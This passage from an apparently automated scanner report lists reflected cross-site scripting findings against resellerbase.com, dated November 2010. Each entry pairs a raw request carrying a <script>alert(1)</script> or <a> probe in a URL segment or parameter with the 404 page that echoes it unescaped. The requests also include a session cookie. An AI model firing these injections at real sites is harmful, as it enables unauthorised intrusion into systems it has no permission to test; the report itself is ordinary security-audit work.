<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos6ba89<script>alert(1)</script>33bfcbb7b33/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2036. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4226d<script>alert(1)</script>56d8f1a04dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images4226d<script>alert(1)</script>56d8f1a04dd/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images4226d<script>alert(1)</script>56d8f1a04dd/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2037. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3ae52<script>alert(1)</script>bc0ee88bf58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating3ae52<script>alert(1)</script>bc0ee88bf58/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating3ae52<script>alert(1)</script>bc0ee88bf58/4.gif was not found on this server.</p>
...[SNIP]...

2.2038. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4aa13<script>alert(1)</script>1480fe098c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/4.gif4aa13<script>alert(1)</script>1480fe098c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/4.gif4aa13<script>alert(1)</script>1480fe098c was not found on this server.</p>
...[SNIP]...

2.2039. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 631a3<script>alert(1)</script>50af7ec63be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/4.gif?631a3<script>alert(1)</script>50af7ec63be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/4.gif?631a3<script>alert(1)</script>50af7ec63be=1 was not found on this server.</p>
...[SNIP]...

2.2040. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5151e<script>alert(1)</script>4edbac2b67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5151e<script>alert(1)</script>4edbac2b67/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5151e<script>alert(1)</script>4edbac2b67/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2041. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ff5d<script>alert(1)</script>0ef79259894 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/295ff5d<script>alert(1)</script>0ef79259894/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/295ff5d<script>alert(1)</script>0ef79259894/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2042. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37dee<script>alert(1)</script>13139eb7d19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes37dee<script>alert(1)</script>13139eb7d19/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes37dee<script>alert(1)</script>13139eb7d19/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2043. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9f3a<script>alert(1)</script>740a1c2357a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmosa9f3a<script>alert(1)</script>740a1c2357a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmosa9f3a<script>alert(1)</script>740a1c2357a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2044. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4a10c<script>alert(1)</script>5605304226a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images4a10c<script>alert(1)</script>5605304226a/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images4a10c<script>alert(1)</script>5605304226a/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2045. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a8d3f<script>alert(1)</script>d26584ecb9a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/ratinga8d3f<script>alert(1)</script>d26584ecb9a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/ratinga8d3f<script>alert(1)</script>d26584ecb9a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2046. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 90b6b<script>alert(1)</script>e1fe7e1ec85 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/search.php90b6b<script>alert(1)</script>e1fe7e1ec85?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php90b6b<script>alert(1)</script>e1fe7e1ec85?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2047. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3cc4e<a>07a793ea203 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3cc4e<a>07a793ea203&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3cc4e<a>07a793ea203&opt=2 was not found on this server.</p>
...[SNIP]...

2.2048. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2517f<a>4bcbd075cc3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...2517f<a>4bcbd075cc3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...2517f<a>4bcbd075cc3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2049. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ba2ab<script>alert(1)</script>f75b6eef62e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba2ab<script>alert(1)</script>f75b6eef62e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba2ab<script>alert(1)</script>f75b6eef62e=1 was not found on this server.</p>
...[SNIP]...

2.2050. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c4739<a>a66e99fcee4 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c4739<a>a66e99fcee4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c4739<a>a66e99fcee4 was not found on this server.</p>
...[SNIP]...

2.2051. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a20c<script>alert(1)</script>2c0e383f141 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5a20c<script>alert(1)</script>2c0e383f141/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5a20c<script>alert(1)</script>2c0e383f141/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2052. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ed36<script>alert(1)</script>feee46ab7c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/291ed36<script>alert(1)</script>feee46ab7c5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/291ed36<script>alert(1)</script>feee46ab7c5/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2053. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5499<script>alert(1)</script>23b145036fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themese5499<script>alert(1)</script>23b145036fd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
